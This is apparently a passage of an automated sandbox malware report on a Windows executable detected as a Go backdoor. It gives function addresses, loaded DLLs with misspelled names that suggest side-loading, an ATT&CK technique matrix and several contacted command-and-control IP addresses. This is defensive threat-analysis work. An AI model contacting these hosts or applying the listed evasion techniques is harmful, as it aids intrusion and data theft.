      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_02923B300_2_02923B30
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_029273340_2_02927334
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_029263720_2_02926372
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_029240BB0_2_029240BB
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_029270D00_2_029270D0
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_029248D50_2_029248D5
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_029298C30_2_029298C3
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_029248EE0_2_029248EE
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_0292481E0_2_0292481E
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_029250300_2_02925030
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_029238310_2_02923831
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_029258540_2_02925854
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_029238400_2_02923840
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_029240450_2_02924045
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_029248680_2_02924868
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_029249960_2_02924996
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_0292719F0_2_0292719F
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_029241820_2_02924182
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_029269B60_2_029269B6
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_029249BB0_2_029249BB
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_029239B80_2_029239B8
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_029261A00_2_029261A0
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_029241AA0_2_029241AA
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_029261A90_2_029261A9
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_029271D80_2_029271D8
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_029291DC0_2_029291DC
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_029241DC0_2_029241DC
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_029269C90_2_029269C9
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_029271E10_2_029271E1
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_029269E90_2_029269E9
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_029279170_2_02927917
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_0292712B0_2_0292712B
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_029279400_2_02927940
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_029259700_2_02925970
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_0292717E0_2_0292717E
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_029239670_2_02923967
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_029249640_2_02924964
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_029259650_2_02925965
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_02926EBE0_2_02926EBE
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_02926EA40_2_02926EA4
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_029266C70_2_029266C7
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_029266CE0_2_029266CE
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_02926EE10_2_02926EE1
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_02924E120_2_02924E12
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_029276180_2_02927618
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_02924E310_2_02924E31
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_02924E360_2_02924E36
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_02923E3F0_2_02923E3F
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_029256230_2_02925623
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_02926E260_2_02926E26
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_02923E2C0_2_02923E2C
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_029246500_2_02924650
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_02926E6A0_2_02926E6A
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_02926F990_2_02926F99
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_029267870_2_02926787
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_02926FB40_2_02926FB4
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_02924FCD0_2_02924FCD
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_029267F00_2_029267F0
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_02925FE30_2_02925FE3
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_02926FEF0_2_02926FEF
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_029277190_2_02927719
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_02928F330_2_02928F33
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_02924F520_2_02924F52
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_02923F660_2_02923F66
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_029267680_2_02926768
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_029264D40_2_029264D4
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_02925CC60_2_02925CC6
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_02925C160_2_02925C16
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_02924C170_2_02924C17
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_02925C270_2_02925C27
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_02925C520_2_02925C52
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_0292445D0_2_0292445D
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_0292344A0_2_0292344A
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_029245830_2_02924583
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_02925D8D0_2_02925D8D
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_02925DB20_2_02925DB2
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_029265B20_2_029265B2
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_02924DB90_2_02924DB9
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_02924DD00_2_02924DD0
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_02923DD70_2_02923DD7
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_029255CC0_2_029255CC
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_029255FE0_2_029255FE
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_02927D1D0_2_02927D1D
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_02923D030_2_02923D03
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_02925D0F0_2_02925D0F
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_0292552B0_2_0292552B
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_02928D570_2_02928D57
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_02925D5B0_2_02925D5B
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_029255590_2_02925559
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_029245660_2_02924566
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_029275650_2_02927565
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_02927D6A0_2_02927D6A
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_0294265F0_2_0294265F
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_029412900_2_02941290
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_02940E800_2_02940E80
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_02942E100_2_02942E10
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_0294121A0_2_0294121A
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_0294160A0_2_0294160A
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_029417B20_2_029417B2
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_029417A70_2_029417A7
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_029417AD0_2_029417AD
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_029417F40_2_029417F4
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_029417490_2_02941749
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_029418850_2_02941885
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_029408870_2_02940887
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_029418C10_2_029418C1
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_02942C5D0_2_02942C5D
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_02942C4F0_2_02942C4F
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_029419990_2_02941999
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_029421C90_2_029421C9
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_029419F70_2_029419F7
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_029419140_2_02941914
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_029419310_2_02941931
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_02942D6D0_2_02942D6D
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_029520410_2_02952041
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_029510790_2_02951079
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_02952B8A0_2_02952B8A
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_029517360_2_02951736
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_02950F3A0_2_02950F3A
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_029517210_2_02951721
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_0295115A0_2_0295115A
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_02950D600_2_02950D60
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_0295256A0_2_0295256A
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_029627E60_2_029627E6
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_0296E5900_2_0296E590
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_02961E910_2_02961E91
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_029626B10_2_029626B1
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_0296EABA0_2_0296EABA
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_0296A2D50_2_0296A2D5
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_02961ACF0_2_02961ACF
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_029626FE0_2_029626FE
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_0296E6E50_2_0296E6E5
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_029626120_2_02962612
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_02969E190_2_02969E19
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_02969E080_2_02969E08
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_029612360_2_02961236
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_0296123B0_2_0296123B
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_02962A5C0_2_02962A5C
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_0296EA750_2_0296EA75
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_029622720_2_02962272
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_0296167D0_2_0296167D
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_0296127A0_2_0296127A
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_02961E670_2_02961E67
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_029612610_2_02961261
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_02961F8F0_2_02961F8F
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_0296D3B20_2_0296D3B2
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_029617BB0_2_029617BB
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_0296B3D70_2_0296B3D7
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_029617E30_2_029617E3
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_02962F050_2_02962F05
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_02961B010_2_02961B01
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_02961B260_2_02961B26
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_029617510_2_02961751
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_0296274D0_2_0296274D
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_0296EB780_2_0296EB78
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_0296ACB60_2_0296ACB6
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_029620B50_2_029620B5
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_029618D40_2_029618D4
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_029760D00_2_029760D0
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_029624CD0_2_029624CD
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_0296DC170_2_0296DC17
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_02962C100_2_02962C10
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_029618030_2_02961803
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_0296203B0_2_0296203B
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_02962C270_2_02962C27
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_0296A02E0_2_0296A02E
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_029618580_2_02961858
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_029620420_2_02962042
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_0296E4710_2_0296E471
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_02962D950_2_02962D95
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_02961D820_2_02961D82
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_029619B60_2_029619B6
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_029649A10_2_029649A1
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_029619D40_2_029619D4
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_029621D50_2_029621D5
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_02969DC00_2_02969DC0
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_029691CF0_2_029691CF
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_029619CB0_2_029619CB
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_02969DCB0_2_02969DCB
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_0296CDF40_2_0296CDF4
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_02962DFA0_2_02962DFA
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_0296191D0_2_0296191D
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_0296A5220_2_0296A522
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: String function: 031D3360 appears 155 times
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: String function: 031AFC50 appears 46 times
      Source: m0Yc9KltGw.exeStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
      Source: m0Yc9KltGw.exeStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
      Source: m0Yc9KltGw.exe, 00000000.00000002.2733958560.000000000C0AC000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameshfolder.dll~/ vs m0Yc9KltGw.exe
      Source: m0Yc9KltGw.exe, 00000000.00000000.1465947188.0000000000CDF000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameshfolder.dll~/ vs m0Yc9KltGw.exe
      Source: m0Yc9KltGw.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
      Source: classification engineClassification label: mal76.troj.evad.winEXE@1/1@0/6
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeFile created: C:\Users\user\AppData\Local\configJump to behavior
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: m0Yc9KltGw.exeReversingLabs: Detection: 45%
      Source: m0Yc9KltGw.exeString found in binary or memory: -Helper process exited with failure code: 0x%x
      Source: m0Yc9KltGw.exeString found in binary or memory: -HelperRegisterTypeLibrary: StatusCode invalidU
      Source: m0Yc9KltGw.exeString found in binary or memory: /LoadInf=
      Source: m0Yc9KltGw.exeString found in binary or memory: /InstallOnThisVersion: Invalid MinVersion string
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeFile read: C:\Users\user\Desktop\m0Yc9KltGw.exeJump to behavior
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeSection loaded: msimg32.dllJump to behavior
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeSection loaded: version.dllJump to behavior
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeSection loaded: mpr.dllJump to behavior
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeSection loaded: k7rn7l32.dllJump to behavior
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeSection loaded: ntd3ll.dllJump to behavior
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeSection loaded: winmm.dllJump to behavior
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeSection loaded: powrprof.dllJump to behavior
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeSection loaded: umpdc.dllJump to behavior
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeSection loaded: mswsock.dllJump to behavior
      Source: m0Yc9KltGw.exeStatic file information: File size 9312768 > 1048576
      Source: m0Yc9KltGw.exeStatic PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x7d9200
      Source: m0Yc9KltGw.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
      Source: m0Yc9KltGw.exeStatic PE information: real checksum: 0x1719f5 should be: 0x8efd91
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_031FB880 rdtscp 0_2_031FB880
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_031CF280 GetProcessAffinityMask,GetSystemInfo,0_2_031CF280
      Source: m0Yc9KltGw.exeBinary or memory string: UDYUCaVhDxVMCIEE
      Source: m0Yc9KltGw.exe, 00000000.00000002.2726670972.0000000000CF8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll-
      Source: m0Yc9KltGw.exeBinary or memory string: YE[UVmCIGh
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_031FB880 rdtscp 0_2_031FB880
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_031E51F0 RtlAddVectoredExceptionHandler,SetUnhandledExceptionFilter,0_2_031E51F0
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeQueries volume information: C:\Users\user\AppData\Local\config VolumeInformationJump to behavior

      Stealing of Sensitive Information

      barindex
      Yara detected GO Backdoor
      Source: Yara matchFile source: 00000000.00000002.2733958560.000000000C008000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: m0Yc9KltGw.exe PID: 1984, type: MEMORYSTR

      Remote Access Functionality

      barindex
      Yara detected GO Backdoor
      Source: Yara matchFile source: 00000000.00000002.2733958560.000000000C008000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: m0Yc9KltGw.exe PID: 1984, type: MEMORYSTR

      Mitre Att&ck Matrix

      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
      Command and Scripting Interpreter      		1
      DLL Side-Loading      		1
      DLL Side-Loading      		1
      Masquerading      		OS Credential Dumping11
      Security Software Discovery      		Remote Services1
      Archive Collected Data      		1
      Encrypted Channel      		Exfiltration Over Other Network MediumAbuse Accessibility Features
      CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
      Deobfuscate/Decode Files or Information      		LSASS Memory12
      System Information Discovery      		Remote Desktop ProtocolData from Removable Media1
      Non-Standard Port      		Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
      DLL Side-Loading      		Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive1
      Non-Application Layer Protocol      		Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook2
      Obfuscated Files or Information      		NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture1
      Application Layer Protocol      		Traffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA SecretsInternet Connection DiscoverySSHKeylogging1
      Proxy      		Scheduled TransferData Encrypted for Impact

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      m0Yc9KltGw.exe46%ReversingLabsWin32.Trojan.Generic

      Dropped Files

      No Antivirus matches

      Unpacked PE Files

      No Antivirus matches

      Domains

      No Antivirus matches

      URLs

      SourceDetectionScannerLabelLink
      http://188.130.206.243http://46.8.232.1060%Avira URL Cloudsafe
      http://188.130.206.2430%Avira URL Cloudsafe
      http://188.130.206.243/0%Avira URL Cloudsafe

      Domains and IPs

      Contacted Domains

      No contacted domains info

      Contacted URLs

      NameMaliciousAntivirus DetectionReputation
      http://46.8.232.106/false
        		high
        http://46.8.236.61/false
          		high
          http://93.185.159.253/false
            		high
            http://188.130.206.243/false
            • Avira URL Cloud: safe
            		unknown
            http://91.212.166.91/false
              		high

              URLs from Memory and Binaries

              NameSourceMaliciousAntivirus DetectionReputation
              http://www.innosetup.com/m0Yc9KltGw.exefalse
                		high
                http://46.8.232.106m0Yc9KltGw.exe, 00000000.00000002.2735492505.000000000C1A8000.00000004.00001000.00020000.00000000.sdmp, m0Yc9KltGw.exe, 00000000.00000002.2735266794.000000000C128000.00000004.00001000.00020000.00000000.sdmpfalse
                  		high
                  http://188.130.206.243http://46.8.232.106m0Yc9KltGw.exe, 00000000.00000002.2735266794.000000000C12A000.00000004.00001000.00020000.00000000.sdmp, m0Yc9KltGw.exe, 00000000.00000002.2735266794.000000000C128000.00000004.00001000.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://188.130.206.243m0Yc9KltGw.exe, 00000000.00000002.2735492505.000000000C1A8000.00000004.00001000.00020000.00000000.sdmp, m0Yc9KltGw.exe, 00000000.00000002.2735266794.000000000C128000.00000004.00001000.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://93.185.159.253m0Yc9KltGw.exe, 00000000.00000002.2735266794.000000000C128000.00000004.00001000.00020000.00000000.sdmpfalse
                    		high
                    http://46.8.236.61m0Yc9KltGw.exe, 00000000.00000002.2735266794.000000000C128000.00000004.00001000.00020000.00000000.sdmpfalse
                      		high
                      http://www.remobjects.com/psm0Yc9KltGw.exefalse
                        		high
                        http://91.212.166.91m0Yc9KltGw.exe, 00000000.00000002.2735266794.000000000C128000.00000004.00001000.00020000.00000000.sdmpfalse
                          		high

                          World Map of Contacted IPs

                          • No. of IPs < 25%
                          • 25% < No. of IPs < 50%
                          • 50% < No. of IPs < 75%
                          • 75% < No. of IPs

                          Public IPs

                          IPDomainCountryFlagASNASN NameMalicious
                          46.8.232.106
                          		unknownRussian Federation
                          		28917FIORD-ASIP-transitoperatorinRussiaUkraineandBalticsfalse
                          188.130.206.243
                          		unknownRussian Federation
                          		200509SVINT-ASNESfalse
                          185.121.233.152
                          		unknownSpain
                          		198432IPCORE-ASEStrue
                          93.185.159.253
                          		unknownRussian Federation
                          		39912I3B-ASATfalse
                          91.212.166.91
                          		unknownUnited Kingdom
                          		35819MOBILY-ASEtihadEtisalatCompanyMobilySAfalse
                          46.8.236.61
                          		unknownRussian Federation
                          		28917FIORD-ASIP-transitoperatorinRussiaUkraineandBalticsfalse

                          General Information

                          Joe Sandbox version:41.0.0 Charoite
                          Analysis ID:1550358
                          Start date and time:2024-11-06 17:17:40 +01:00
                          Joe Sandbox product:CloudBasic
                          Overall analysis duration:0h 6m 6s
                          Hypervisor based Inspection enabled:false
                          Report type:full
                          Cookbook file name:default.jbs
                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                          Number of analysed new started processes analysed:6
                          Number of new started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:0
                          Technologies:
                          • HCA enabled
                          • EGA enabled
                          • AMSI enabled
                          Analysis Mode:default
                          Analysis stop reason:Timeout
                          Sample name:m0Yc9KltGw.exe
                          renamed because original name is a hash value
